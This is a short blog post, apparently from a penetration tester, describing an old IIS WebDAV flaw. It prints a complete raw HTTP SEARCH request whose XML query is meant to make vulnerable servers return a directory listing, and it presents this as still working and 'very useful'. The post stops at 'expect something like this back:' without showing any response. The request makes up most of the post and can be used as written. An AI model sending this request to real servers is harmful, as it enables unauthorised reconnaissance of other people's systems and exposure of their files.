IIS Search Verb Directory Listing

mubix included in iis

2011-08-26 55 words One minute

Contents

This: http://www.securityfocus.com/bid/1756 still works (on vulnerable hosts, this is an old vuln) and is very useful:

Send this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


SEARCH / HTTP/1.1  
Host: target  
Content-Type: text/xml  
Content-Length: 133  
  
<?xml version="1.0"?>  
<g:searchrequest xmlns:g="DAV:">  
<g:sql>  
Select "DAV:displayname" from scope()  
</g:sql>  
</g:searchrequest>

And expect something like this back: